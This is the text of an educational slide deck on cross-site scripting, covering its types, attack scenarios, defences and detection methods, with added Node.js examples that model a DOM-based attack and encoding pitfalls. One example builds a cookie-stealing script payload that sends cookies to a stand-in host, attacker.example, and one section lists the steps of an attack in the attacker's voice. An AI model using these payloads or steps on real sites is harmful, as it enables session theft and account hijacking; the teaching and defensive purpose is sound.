Cross-Site Scripting (XSS)
Mattash Ali
What is an XSS Attack?
XSS is a potentially dangerous security vulnerability found in web-based applications. It allows a malicious user to inject client-side code (usually JavaScript) into a webpage that other users view. XSS is very easy to execute and very long and arduous to repair:
- It takes about 52 days on average to fix an XSS hole.
- 10-25 XSS holes are found in commercial products every month.
During an attack "everything looks fine" to the end user, but in actuality they are exposed to an endless amount of threats.
XSS Attacks Are Used For:
- Hijacking accounts
- False advertising and inserting hostile content
- Cookie theft/poisoning and defacing websites
- Changing user settings
- Conducting phishing attacks
Types of XSS Attacks
Non-Persistent (Reflected)
- The most common type.
- Unvalidated user-supplied data is included in the resulting webpage without HTML encoding, so client-side code can be injected into the dynamically generated page.
- An attacker convinces a user to follow a malicious URL; the server reflects the injected code back in the resulting page.
- The injected script runs in the origin of the vulnerable page, so it has full access to that page's content and to the user's session (cookies) for that site.
Attack Scenario of Non-Persistent
1. The user comes in contact with a malicious link, form, or redirection prepared by the attacker.
2. The user's browser requests the bank's web application, with the XSS code carried in the request.
3. The XSS code is inserted into the page through an XSS vulnerability in the banking application.
4. The infected page, now containing the XSS code, is sent to the user.
5. Because the XSS code arrives as part of the bank's page, it runs in the bank's origin; the browser's "Same Origin" policy therefore does not restrict it.
6. The XSS code sends stolen data to the attacker's server.
Methodology
Let us look at how this works with a simple example of a search feature on a website: the user searches for "foobar" and the search term is echoed back in the results page.
The HTML the browser is processing looks like this:
Methodology (contd.)
By replacing foobar with JavaScript, an attacker can collect cookies: the customer's web browser will be instructed to redirect itself to the hacker's website, with the cookies appended to the URL.
Methodology (contd.)
A non-persistent reflection point demands the use of a third party to exploit it: the attacker cannot trigger it alone and must get a victim to send the crafted request.
Imagine an e-mail like this being sent to customers:
The e-mail doesn't show the full URL, hiding the malicious code at the very end.
Types of XSS Attacks (contd.)
Persistent (Stored)
- Allows the most powerful kinds of attacks.
- First, data supplied by the attacker is stored on the server by the web application; later it is shown to other users on a webpage without any HTML encoding.
- Example: an online message board that allows users to post messages for other users to read.
- With this method, malicious scripts can be served more than once. One attack can affect a large number of users, and the application can also be infected by an XSS virus or worm.
Attack Scenario of Persistent
1. The attacker calls the bank's web application with the XSS code.
2. The malicious code enters through an XSS vulnerability in the application and is stored there.
3. A user calls the bank's web application.
4. The malicious code is loaded from storage into the web page.
5. The infected web page is sent to the user.
6. Because the XSS code arrives as part of the bank's page, it runs in the bank's origin; the browser's "Same Origin" policy does not restrict it.
7. The XSS code sends stolen data to the attacker's server.
Methodology
Step A) On the product.php?id=1 page, users see the product along with customer comments.
Step B) On product_review.php?id=1, a hacker leaves a review with malicious code.
Methodology (contd.)
Step C) They receive a thank-you message.
Step D) You will notice that their attack does not show up immediately, but if you return to product.php?id=1, the new comment is displayed.
Methodology (contd.)
The HTML the browser would process includes the malicious code hidden in the source:
Types of XSS Attacks (contd.)
DOM-Based (Local)
- The Document Object Model (DOM) is the standard object model for representing HTML or XHTML.
- The problem exists within the page's client-side script rather than on the server: the script reads attacker-controlled data (for example from the URL or a cookie) and writes it into the document without encoding.
- If an attacker hosts a malicious site that makes a vulnerable page (including one stored on the client's local system) process attacker-controlled input, a script can be injected.
- The attacker's script then runs with the privileges that user's browser grants the vulnerable page on their system.
Attack Scenario of DOM-Based
1. The attacker prepares the call to the bank's web application, with the XSS code placed in a cookie.
2. The cookie carrying the malicious code is sent to the user and stored in the user's browser.
3. The user calls the bank's web application.
4. The page's client-side script reads the cookie and inserts the malicious code into the web page.
5. The infected web page is displayed to the user.
6. The XSS code sends stolen data to the attacker's server.
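The DOM-based case modelled outside a browser, as an added example in Node.js (not code from the original slides). It uses the URL fragment rather than the cookie of the scenario above as the attacker-controlled source, because the fragment shows the defining property most clearly: the server never receives it, so server-side filtering cannot catch it. A tiny fake element stands in for the DOM, and the function and variable names are assumptions made for this example.

```javascript
// Added example, not from the original slides: DOM-based XSS modelled without
// a browser. The page's own client-side script reads part of the URL and
// writes it into the document. A minimal fake element plays the DOM; the
// function and variable names are assumptions made for this example.

// What an HTTP server receives from a URL: path and query, never the fragment.
// Anything a client-side script takes from location.hash is invisible to
// server-side validation or a filtering proxy.
function serverSideView(urlString) {
  const u = new URL(urlString);
  return u.pathname + u.search;
}

// Stand-in for a DOM element. The html field holds what element.innerHTML
// would read back after the assignment.
function fakeElement() {
  return {
    html: '',
    // innerHTML sink: the string is parsed as markup, scripts included.
    set innerHTML(markup) {
      this.html = markup;
    },
    // textContent sink: the string becomes a text node; serialising it back
    // escapes &, < and >, which is what a real browser does.
    set textContent(text) {
      const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;' };
      this.html = String(text).replace(/[&<>]/g, (c) => map[c]);
    },
  };
}

// The vulnerable page script: greet the user by the name given after '#'.
function greetVulnerable(urlString) {
  const name = decodeURIComponent(new URL(urlString).hash.slice(1));
  const el = fakeElement();
  el.innerHTML = 'Welcome ' + name; // HTML sink: injected markup is executed
  return el.html;
}

// The fixed page script: same source, written through a text sink.
function greetSafe(urlString) {
  const name = decodeURIComponent(new URL(urlString).hash.slice(1));
  const el = fakeElement();
  el.textContent = 'Welcome ' + name; // text sink: markup is shown, not run
  return el.html;
}

// Stand-in for the browser's parser: would this markup start a script element?
function containsScript(html) {
  return /<script\b[^>]*>/i.test(html);
}

// Constructed attack URL: the whole payload lives in the fragment.
const ATTACK_URL =
  'http://bank.example/welcome.html#' +
  encodeURIComponent(
    "<script>document.location='http://attacker.example/?c='+document.cookie</script>"
  );
```

serverSideView(ATTACK_URL) returns only /welcome.html, which is why the server-side log of such an attack shows an innocent-looking request. The fix is in the client-side script: the same data written through textContent (or another text-only sink) cannot become markup.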
Steps to an XSS Attack
1. Select a target: find an XSS hole and look whether the site sets any cookies. If it does, you have found a target.
2. Testing: insert code or a script pointing at the vulnerability, and make sure the page does not appear broken.
3. XSS execution: send your crafted URL to launch it. More experienced attackers would do a few redirects to steal cookies, return to the site, then attack it harder.
4. Decide what to do with the data: after collecting data, it is possible to perform a further attack, such as hijacking the account.
Existing Methods to Solve XSS Problems
A. Dynamic Approach
1) Vulnerability analysis based approach: tracks untrusted data through the application at the character level (dynamic taint tracking).
2) Attack prevention approach: a web proxy between the browser and the web application blocks the transfer of sensitive information to the attacker.
B. Static Analysis
2) String analysis.
3) Preventing XSS using untrusted scripts.
4) Software testing techniques (black-box testing).
Existing Methods to Solve XSS Problems (contd.)
C. Static and Dynamic Analysis Combination
Lattice-based analysis (white-box testing): WebSSARI is a tool that combines static and runtime features; it applies static taint propagation analysis to find security vulnerabilities.
How to Protect Against XSS
Never trust input and always filter meta-characters, encoding them as HTML character references before they are written into a page:
Character   Encoded as
<           &lt;
>           &gt;
(           &#40;
)           &#41;
"           &quot;
'           &#39;
#           &#35;
%           &#37;
+           &#43;
&           &amp;
;           &#59;
-           &#45;
This will eliminate almost 90% of problems. The encoding must match the output context (element body, quoted attribute, URL, or script); a single table does not cover every context.
Further advice for users:
- View material only from official websites.
- Be cautious when reading e-mails, discussion boards, posts, etc.
- Turn off JavaScript in the browser settings; in IE, set the security settings to high.
Further advice for developers: use custom tag libraries that encode output automatically.
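The meta-character table above implemented as a small encoder, then checked in two output contexts where it is not enough on its own: a URL attribute that receives a javascript: URL, and an unquoted attribute value. This is an added example in Node.js, not code from the original slides; the function names and the tag-attribute parser are assumptions made for the example. The parser is deliberately crude, just enough to show which attributes a browser would see.

```javascript
// Added example, not from the original slides: the meta-character table
// applied by an encoder, then checked in contexts where it is not sufficient.
// Function names and the crude attribute parser are assumptions for this example.

const META = {
  '<': '&lt;', '>': '&gt;', '(': '&#40;', ')': '&#41;', '#': '&#35;',
  '%': '&#37;', '+': '&#43;', '&': '&amp;', ';': '&#59;', '"': '&quot;',
  "'": '&#39;', '-': '&#45;',
};

// Single-pass replacement, so '&' is never double-encoded.
function encodeMeta(s) {
  return String(s).replace(/[<>()#%+&;"'\-]/g, (c) => META[c]);
}

// What a browser does with an attribute value: decode character references
// first, then interpret the result (as a URL, an event handler, ...).
function decodeAttributeValue(v) {
  const named = { amp: '&', lt: '<', gt: '>', quot: '"', apos: "'" };
  return v.replace(/&(#(\d+)|[a-z]+);/gi, (m, body, num) =>
    num !== undefined ? String.fromCharCode(Number(num)) : (named[body.toLowerCase()] ?? m));
}

// Context 1: element body. The table is enough here; no tag can be formed.
function renderBody(input) {
  return `<p>Hello ${encodeMeta(input)}</p>`;
}

// Context 2: URL attribute. The table is applied, yet after attribute decoding
// the browser sees the javascript: URL again and runs it on click.
function renderLinkEncodedOnly(input) {
  return `<a href="${encodeMeta(input)}">profile</a>`;
}

// Hardened: allow only http(s) URLs before encoding for the attribute.
function renderLinkSafe(input) {
  let scheme = null;
  try { scheme = new URL(input).protocol; } catch (e) { /* not a valid URL */ }
  const href = scheme === 'http:' || scheme === 'https:' ? input : '#';
  return `<a href="${encodeMeta(href)}">profile</a>`;
}

// Context 3: unquoted attribute. Space and '=' are not in the table, so the
// value can end early and add an event-handler attribute of its own.
function renderUnquotedInput(input) {
  return `<input value=${encodeMeta(input)}>`;
}

// Hardened: always quote attribute values; the quotes themselves are encoded.
function renderQuotedInput(input) {
  return `<input value="${encodeMeta(input)}">`;
}

// Attribute names a browser would see in a single tag (quoted values are
// consumed whole, unquoted values end at whitespace or '>').
function attributeNames(tag) {
  const names = [];
  const re = /\s([a-z-]+)(?:=("[^"]*"|'[^']*'|[^\s>]*))?/gi;
  let m;
  while ((m = re.exec(tag)) !== null) names.push(m[1].toLowerCase());
  return names;
}

// Scheme of the decoded href value, or null if it is not a parseable URL.
function hrefScheme(tag) {
  const m = /href="([^"]*)"/.exec(tag);
  if (!m) return null;
  try { return new URL(decodeAttributeValue(m[1])).protocol; } catch (e) { return null; }
}
```

renderLinkEncodedOnly('javascript:alert(1)') produces href="javascript:alert&#40;1&#41;", which a browser decodes back to a working javascript: URL; renderUnquotedInput('x onmouseover=alert(1)') yields a tag with a second, attacker-supplied onmouseover attribute. Both are caught by choosing the right rule for the context (scheme allowlist, quoted attributes) rather than by a longer character table.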
Conclusion
XSS is ranked as the number one and most prevalent website vulnerability on the internet (OWASP Top 10 2007, A1).
No one is ever completely safe from XSS: developers cannot be expected to write flawless code or to have round-the-clock personnel answering every possible vulnerability report.
As XSS vulnerabilities continue to grow, the best way to protect yourself is to be careful, be aware of its existence, and encode untrusted data wherever it is written into a page.
References
- http://en.wikipedia.org/wiki/Cross-site_scripting
- http://www.cgisecurity.com/articles/xss-faq.shtml
- http://www.owasp.org/index.php/Top_10_2007-A1
- http://ha.ckers.org/xss.html
- Bernard Menezes, Network Security and Cryptography, Cengage Learning, 2010.
- Fraser Howard, Modern web attacks, SophosLabs UK, August 2007.
- "Cross Site Scripting" [online]. Available: http://www.cgisecurity.com/xss-faq.html
- "HTTP Header Injection" [online]. Available: http://blogs.msdn.com/b/esiu/archive/2007/09/22/http-header-injection-vulnerabilities.aspx
- "HTTP Response Splitting" [online]. Available: http://www.owasp.org/index.php/HTTP_Response_Splitting
- http://www.xssed.com/article/6/Paper_Kr3ws_Cross-Site_Scripting_Tutorial/
- http://shiflett.org/articles/foiling-cross-site-attacks
Picture References
- http://www.midmarket.eweek.com/images/stories/Slideshows/top_website_vulnerabilities/vulnerable02.jpg
- http://talks.php.net/presentations/slides/php-under-attack/xss.png
- http://images.google.com/imgres?imgurl=http://www.timelessprototype.com/tpdc/blog/image.axd%3Fpicture%3DCross%2BEyed%2BScripting%2BBug.png&imgrefurl=http://www.timelessprototype.com/tpdc/blog/%3Ftag%3D/etiquette&usg=__7A8nC-4J6Jd1heOY4HEg1bo4YRQ=&h=592&w=709&sz=292&hl=en&start=60&tbnid=bytIySB5LrMoKM:&tbnh=117&tbnw=140&prev=/images%3Fq%3Dcross-site%2Bscripting%26start%3D40%26gbv%3D2%26ndsp%3D20%26hl%3Den%26sa%3DN
- http://images.google.com/imgres?imgurl=http://bp2.blogger.com/_17vaN5T6Cbw/SEx5xbTHiHI/AAAAAAAAAOE/2xtRR9cT2Jo/s200/NoScript.png&imgrefurl=http://www.infopowered.blogspot.com/&usg=__rjX_EUzPz0y8_teWb818RzD8cCs=&h=200&w=200&sz=37&hl=en&start=225&tbnid=5ULzggLJ0pPHmM:&tbnh=104&tbnw=104&prev=/images%3Fq%3Dcross-site%2Bscripting%26start%3D220%26gbv%3D2%26ndsp%3D20%26hl%3Den%26sa%3DN
- http://images.google.com/imgres?imgurl=http://i.haymarket.net.au/utils/sc/ImageResizer.ashx%3Fn%3Dhttp://backoffice.ajb.com.au%252Fimages%252Fnews%252Fphishingmoney.jpg%26w%3D218&imgrefurl=http://www.securecomputing.net.au/News/93871,yahoo-and-ebay-hook-up-on-phisher-blocker.aspx&usg=__9kqYJaZ4d7WxWMuzvcv_VENQy6Q=&h=329&w=218&sz=19&hl=en&start=299&tbnid=0A-rLlxgIugEqM:&tbnh=119&tbnw=79&prev=/images%3Fq%3Dcross-site%2Bscripting%26start%3D280%26gbv%3D2%26ndsp%3D20%26hl%3Den%26sa%3DN
THANK YOU!
Beware of the XSS Mosquito!